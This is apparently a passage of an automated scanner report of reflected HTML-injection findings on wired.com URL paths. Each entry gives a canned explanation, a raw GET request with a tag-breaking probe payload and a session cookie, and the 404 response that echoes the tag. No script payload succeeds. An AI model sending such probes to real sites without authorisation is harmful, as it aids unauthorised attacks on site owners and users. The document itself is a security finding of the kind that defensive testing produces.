Expires: Sun, 21 Nov 2010 23:09:51 GMT
Date: Sun, 21 Nov 2010 23:05:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars215d7"><a>d31fce4364 ss_coolwheels">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a5e"><a>3d542f5f695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/coolwheelsf0a5e"><a>3d542f5f695 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29323
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_coolwheelsf0a5e"><a>3d542f5f695">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d8b"><a>cd4df970211 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars93d8b"><a>cd4df970211/energy HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:53 GMT
Date: Sun, 21 Nov 2010 23:05:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars93d8b"><a>cd4df970211 ss_energy"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3cd"><a>1fe87d440bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/energy1a3cd"><a>1fe87d440bf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=554
Expires: Sun, 21 Nov 2010 23:15:34 GMT
Date: Sun, 21 Nov 2010 23:06:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars ss_energy1a3cd"><a>1fe87d440bf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a14"><a>265d8487a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /carse5a14"><a>265d8487a92/futuretransport HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29333
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:58 GMT
Date: Sun, 21 Nov 2010 23:05:58 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_carse5a14"><a>265d8487a92 ss_futuretransport"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c73"><a>e09bc35649e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/futuretransport36c73"><a>e09bc35649e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29333
Vary: Accept-Encoding
Cache-Control: max-age=583
Expires: Sun, 21 Nov 2010 23:16:08 GMT
Date: Sun, 21 Nov 2010 23:06:25 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars ss_futuretransport36c73"><a>e09bc35649e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8402"><a>edd50cf471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee8402"><a>edd50cf471 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29238
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:14 GMT
Date: Mon, 22 Nov 2010 01:11:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee8402"><a>edd50cf471"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53de"><a>40592780ce4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee53de"><a>40592780ce4/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29241
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 20:15:44 GMT
Date: Sun, 21 Nov 2010 20:11:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee53de"><a>40592780ce4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dbf8"><a>ab6cb8357ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture8dbf8"><a>ab6cb8357ba/art HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29251
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:58 GMT
Date: Sun, 21 Nov 2010 23:05:58 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture8dbf8"><a>ab6cb8357ba ss_art"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d542"><a>e8d21a02e71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art4d542"><a>e8d21a02e71 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29251
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:24 GMT
Date: Sun, 21 Nov 2010 23:06:24 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art4d542"><a>e8d21a02e71"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86153"><a>a16e375242b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture86153"><a>a16e375242b/art/magazine/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture86153"><a>a16e375242b ss_art c_magazine"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d77"><a>f26f00f82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art44d77"><a>f26f00f82f/magazine/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29283
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:41 GMT
Date: Sun, 21 Nov 2010 23:06:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art44d77"><a>f26f00f82f c_magazine"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1d9"><a>1df8fb955e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/magazine8e1d9"><a>1df8fb955e1/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=556
Expires: Sun, 21 Nov 2010 23:16:11 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_magazine8e1d9"><a>1df8fb955e1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26ce"><a>beebd8a9cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec26ce"><a>beebd8a9cd7/art/magazine/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec26ce"><a>beebd8a9cd7 ss_art c_magazine"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a6e"><a>642ea85b965 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/artc4a6e"><a>642ea85b965/magazine/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=581
Expires: Sun, 21 Nov 2010 23:16:23 GMT
Date: Sun, 21 Nov 2010 23:06:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artc4a6e"><a>642ea85b965 c_magazine"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a844"><a>403dadf803e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/magazine2a844"><a>403dadf803e/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=546
Expires: Sun, 21 Nov 2010 23:16:05 GMT
Date: Sun, 21 Nov 2010 23:06:59 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_magazine2a844"><a>403dadf803e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72fa5"><a>049ef037e84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture72fa5"><a>049ef037e84/art/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture72fa5"><a>049ef037e84 ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f72b"><a>f7633aef4b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art3f72b"><a>f7633aef4b8/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:09 GMT
Date: Sun, 21 Nov 2010 23:07:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art3f72b"><a>f7633aef4b8 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851a2"><a>7554777a3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia851a2"><a>7554777a3ab/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:23 GMT
